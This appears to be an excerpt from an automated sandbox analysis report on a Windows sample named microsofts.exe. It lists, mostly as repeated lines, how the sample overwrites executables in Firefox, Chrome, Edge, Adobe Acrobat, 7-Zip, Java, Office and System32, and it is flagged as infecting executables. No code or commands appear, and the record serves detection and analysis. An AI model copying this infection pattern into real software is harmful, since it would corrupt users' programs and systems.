                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Infects executable files (exe, dll, sys, html)
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
